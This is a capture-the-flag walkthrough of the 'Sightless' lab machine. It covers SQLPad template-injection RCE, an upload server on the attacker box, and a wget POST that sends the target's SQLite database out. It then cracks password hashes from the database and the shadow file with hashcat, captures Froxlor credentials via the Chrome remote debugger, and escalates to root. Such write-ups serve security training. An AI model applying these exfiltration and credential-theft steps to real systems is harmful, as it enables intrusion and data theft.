Enumeraton
NMAP
PORT STATE SERVICE VERSION
21/tcp open ftp
| fingerprint-strings:
| GenericLines:
| 220 ProFTPD Server (sightless.htb FTP Server) [::ffff:10.10.11.32]
| Invalid command: try being more creative
|_ Invalid command: try being more creative
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 c9:6e:3b:8f:c6:03:29:05:e5:a0:ca:00:90:c9:5c:52 (ECDSA)
|_ 256 9b:de:3a:27:77:3b:1b:e1:19:5f:16:11:be:70:e0:56 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://sightless.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)Website
Nothing particularly interesting, except further down, where you are redirected to a subdomain via the button for SQLPAD.
The tool appears to allow the execution of SQL queries. The version can be viewed by clicking the three dots in the top-right corner.
Exploit
There is a CVE associated with this version:
CVE-2022-0944 : Template injection in connection test endpoint leads to RCE in GitHub repository
CVE-2022-0944 : Template injection in connection test endpoint leads to RCE in GitHub repository sqlpad/sqlpad prior to…
The vulnerability allows remote code execution on the target system. There are many exploits available for this flaw. I used the following one, which worked immediately.
As you can see, you are already the root user. However, no flags are found in the user directories. The SQLPAD directory, however, contains a SQLite file.
File-Transfer
Unfortunately, there are very few tools installed, such as scp or Python for file transfer, so you have to get a bit creative. Fortunately, wget is available.
On the attack machine, start a Python3 server that accepts POST requests and saves the file in an upload folder.
Python-Server
from http.server import HTTPServer, BaseHTTPRequestHandler
import os
import sqlite3
class SQLiteUploadHandler(BaseHTTPRequestHandler):
upload_dir = "uploads"
def do_POST(self):
# read header for file-size
content_length = int(self.headers['Content-Length'])
post_data = self.rfile.read(content_length)
# create directory if not existing
os.makedirs(self.upload_dir, exist_ok=True)
# save file as "uploaded_file.sqlite"
file_path = os.path.join(self.upload_dir, "uploaded_file.sqlite")
with open(file_path, "wb") as f:
f.write(post_data)
# Check for valid sql-file
if self.is_valid_sqlite(file_path):
self.send_response(200)
self.end_headers()
self.wfile.write(b"SQLite-file successfully uploaded and valid")
else:
os.remove(file_path) # delete non valid file
self.send_response(400)
self.end_headers()
self.wfile.write(b"The uploaded file is not a valid sqllite-file")
def is_valid_sqlite(self, file_path):
"""Check if its a valid SQLite-Database."""
try:
with sqlite3.connect(file_path) as conn:
conn.execute("SELECT 1") # Testrequest
return True
except sqlite3.Error:
return False
def do_GET(self):
self.send_response(200)
self.end_headers()
self.wfile.write(b"This server accepts post requests for sqlite files")
# Start Server
if __name__ == "__main__":
host = "0.0.0.0"
port = 8000
print(f"Server running on http://{host}:{port}")
server = HTTPServer((host, port), SQLiteUploadHandler)
server.serve_forever()Start Python-Server
python3 post_server.pyTransfer File
wget --method=POST --body-file=sqlpad.sqlite http://IP-ATTACK-BOX:8000/
SQLite
The file can now be opened with sqlite3.
Querying the data from the Users table returns a hash for the user “admin.”
This can be quickly and easily cracked with Hashcat.
hashhashcat -m 3200 hashes /usr/share/seclists/Passwords/2023-200_most_used_passwords.txt
At this point, I hadn’t found an admin login where the password could be used. Therefore, I copied Michael’s password hash from the shadow file and cracked it with Hashcat to establish a stable connection via an SSH client and possibly log into the FTP. The admin user didn’t work there.
hashcat hash_michael /usr/share/wordlists/rockyou.txt
User-Flag
Logged in as the user Michael, the user flag can be found.
Interestingly, in the user directory, another user appears: “John.” It seems that you are not logged into the host that is hosting the SQL application. This also explains why SSH was not available as a command.
Anyway, it looks like something is being hosted here and is published on port 8080.
Froxlor
To become John, I copied and ran linpeas on the “box.” Linpeas identified the following attack vector.
I tried a few things to access the debugger’s port, but the port was marked as 0, meaning it is randomly chosen by the system. Therefore, I returned to focusing on the service running on port 8080. A simple SSH forwarding allows me to access the web service from the attacker VM.
ssh -L 8080:localhost:8080 [email protected]
And sure enough, the service can be accessed.
A look into the internal host file reveals a new subdomain, where the application might be running.
By modifying the local host file, you can now access the login page.
Unfortunately, the cracked credentials from the SQLite file don’t work. However, I took a closer look at the login page and noticed some interesting directories.
/bin/
/tests/
/server-status/Unfortunately, this led to a dead end, so I returned to the remote debugger service. Since, as mentioned earlier, no specific port could be identified, I tried all the ports that were published on the machine.
So, I forwarded the ports again and configured the destinations in the Chrome debugger until a device appeared.
ssh -L PORT:127.0.0.1:PORT [email protected]Then, using DevTools (click “Inspect”), I monitored the network traffic and extracted the login credentials.
Now, you can log in through the admin page.
Through PHP versions, system commands can be executed. I tried to change the password for the user John, but unfortunately, that didn’t work. So, I copied the flag to /tmp and then restarted the service via System -> Settings.
Unfortunately, the file cannot be opened yet due to missing permissions. Therefore, you can either copy the root’s id_rsa key to /tmp and use it to connect to the machine, or you can adjust the permissions of the flag and access it through the user Michael.
